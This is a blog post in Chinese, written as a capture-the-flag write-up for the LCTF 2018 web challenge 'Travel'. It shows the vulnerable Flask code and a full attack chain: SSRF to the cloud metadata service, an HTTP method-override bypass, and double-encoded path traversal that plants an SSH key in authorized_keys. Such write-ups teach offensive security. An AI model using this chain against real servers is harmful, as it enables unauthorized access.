<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/boogle.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/boogle.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ssrf,">










<meta name="description" content="0x00 前言来源于lctf2018的一道web题：Travel 0x01 题目源码首先题目给出源码1234567891011121314151617181920212223242526@app.route(&amp;apos;/upload/&amp;lt;filename&amp;gt;&amp;apos;, methods = [&amp;apos;PUT&amp;apos;])def upload_file(filename):">
<meta name="keywords" content="ssrf">
<meta property="og:type" content="article">
<meta property="og:title" content="python ssrf+put上传ssh公钥">
<meta property="og:url" content="http://yoursite.com/2018/11/19/python-ssrf-put上传ssh公钥/index.html">
<meta property="og:site_name" content="Boogle&#39;s Blogs">
<meta property="og:description" content="0x00 前言来源于lctf2018的一道web题：Travel 0x01 题目源码首先题目给出源码1234567891011121314151617181920212223242526@app.route(&amp;apos;/upload/&amp;lt;filename&amp;gt;&amp;apos;, methods = [&amp;apos;PUT&amp;apos;])def upload_file(filename):">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.loli.net/2018/11/19/5bf2c77eda015.png">
<meta property="og:image" content="https://i.loli.net/2018/11/19/5bf2c7ef6a5a2.png">
<meta property="og:image" content="https://i.loli.net/2018/11/19/5bf2c8afaa11a.png">
<meta property="og:image" content="https://i.loli.net/2018/11/19/5bf2c9d069ee2.png">
<meta property="og:updated_time" content="2019-02-21T05:33:42.110Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="python ssrf+put上传ssh公钥">
<meta name="twitter:description" content="0x00 前言来源于lctf2018的一道web题：Travel 0x01 题目源码首先题目给出源码1234567891011121314151617181920212223242526@app.route(&amp;apos;/upload/&amp;lt;filename&amp;gt;&amp;apos;, methods = [&amp;apos;PUT&amp;apos;])def upload_file(filename):">
<meta name="twitter:image" content="https://i.loli.net/2018/11/19/5bf2c77eda015.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/19/python-ssrf-put上传ssh公钥/">





  <title>python ssrf+put上传ssh公钥 | Boogle's Blogs</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Boogle's Blogs</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/19/python-ssrf-put上传ssh公钥/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="boogle">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Boogle's Blogs">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">python ssrf+put上传ssh公钥</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-11-19T13:28:07+08:00">
                2018-11-19
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/python安全/" itemprop="url" rel="index">
                    <span itemprop="name">python安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>来源于lctf2018的一道web题：Travel</p>
<h2 id="0x01-题目源码"><a href="#0x01-题目源码" class="headerlink" title="0x01 题目源码"></a>0x01 题目源码</h2><p>首先题目给出源码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">@app.route(&apos;/upload/&lt;filename&gt;&apos;, methods = [&apos;PUT&apos;])</span><br><span class="line">def upload_file(filename):</span><br><span class="line">    name = request.cookies.get(&apos;name&apos;)</span><br><span class="line">    pwd = request.cookies.get(&apos;pwd&apos;)</span><br><span class="line">    if name != &apos;lctf&apos; or pwd != str(uuid.getnode()):</span><br><span class="line">        return &quot;0&quot;</span><br><span class="line">    filename = urllib.unquote(filename)</span><br><span class="line">    with open(os.path.join(app.config[&apos;UPLOAD_FOLDER&apos;], filename), &apos;w&apos;) as f:</span><br><span class="line">        f.write(request.get_data(as_text = True))</span><br><span class="line">        return &quot;1&quot;</span><br><span class="line">    return &quot;0&quot;</span><br><span class="line"></span><br><span class="line">@app.route(&apos;/&apos;, methods = [&apos;GET&apos;])</span><br><span class="line">def index():</span><br><span class="line">    url = request.args.get(&apos;url&apos;, &apos;&apos;)</span><br><span class="line">    if url == &apos;&apos;:</span><br><span class="line">        return render_template(&apos;index.html&apos;)</span><br><span class="line">    if &quot;http&quot; != url[: 4]:</span><br><span class="line">        return &quot;hacker&quot;</span><br><span class="line">    try:</span><br><span class="line">        response = requests.get(url, timeout = 10)</span><br><span class="line">        response.encoding = &apos;utf-8&apos;</span><br><span class="line">        return response.text</span><br><span class="line">    except:</span><br><span class="line">        return &quot;Something Error&quot;</span><br></pre></td></tr></table></figure></p>
<h2 id="0x02-题目分析"><a href="#0x02-题目分析" class="headerlink" title="0x02 题目分析"></a>0x02 题目分析</h2><p>可以看到只要<strong>name=’lctf’&amp;&amp;pwd=str(uuid.getnode())</strong>即可登陆成功上传任意文件。<br>而这里需要知道uuid.getnode()也就是网卡地址。正常的话可以读取/sys/class/net/eth0/address来获得。题目是Python + requests库。requests库的底层是urllib，而没有任何扩展的urllib仅支持http和https协议，因此我们没有办法读取任意文件。我们查一查IP，就能发现是腾讯云的机器。既然是云服务商，那么通常就会有一个metadata的API。例如，Amazon EC2，就可以通过 <a href="http://169.254.169.254" target="_blank" rel="noopener">http://169.254.169.254</a> 来获取metadata，而所有基于OpenStack搭建的云服务也都使用这个地址。</p>
<p>因此，让我们查看<a href="https://cloud.tencent.com/document/product/213/4934" target="_blank" rel="noopener">腾讯云的文档</a>，很容易就能搞出payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://118.25.150.86/?url=http://metadata.tencentyun.com/latest/meta-data/mac</span><br></pre></td></tr></table></figure></p>
<p>得到网卡地址<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">52:54:00:48:c8:73（hex）-&gt;90520735500403(int)</span><br></pre></td></tr></table></figure></p>
<p>然后在put的时候会出现一个问题</p>
<p><img src="https://i.loli.net/2018/11/19/5bf2c77eda015.png" alt></p>
<p>会出现一个405 not allowed<br>而与POST出现的不太一样。<br><img src="https://i.loli.net/2018/11/19/5bf2c7ef6a5a2.png" alt></p>
<p>那么这里可以确认是Nginx层面上禁止了PUT。Flask对这个问题有解决方案，即X-HTTP-Method-Override头。<br><img src="https://i.loli.net/2018/11/19/5bf2c8afaa11a.png" alt></p>
<p>这里利用任意文件写+目录穿透上传ssh公钥。<br>在本地生成ssh公钥<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd /root/.ssh/</span><br><span class="line"></span><br><span class="line">ssh-keygen -t rsa -P &apos;&apos;</span><br></pre></td></tr></table></figure></p>
<p>然后将公钥上传到目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/home/lctf/.ssh/authorized_keys</span><br></pre></td></tr></table></figure>
<p>这里需要注意到是需要将目录进行两次url编码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">..%252f..%252f..%252f..%252f..%252f..%252fhome%252flctf%252f.ssh%252fauthorized_keys</span><br></pre></td></tr></table></figure></p>
<p>然后即可进行登陆<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh lctf@118.25.150.86</span><br></pre></td></tr></table></figure></p>
<p><img src="https://i.loli.net/2018/11/19/5bf2c9d069ee2.png" alt></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ssrf/" rel="tag"># ssrf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/16/python-安全-tips/" rel="next" title="python安全tips">
                <i class="fa fa-chevron-left"></i> python安全tips
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/21/session反序列化-soap-ssrf-crlf/" rel="prev" title="session反序列化+soap(ssrf+crlf)">
                session反序列化+soap(ssrf+crlf) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">boogle</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">35</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">categories</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-题目源码"><span class="nav-number">2.</span> <span class="nav-text">0x01 题目源码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-题目分析"><span class="nav-number">3.</span> <span class="nav-text">0x02 题目分析</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">boogle</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
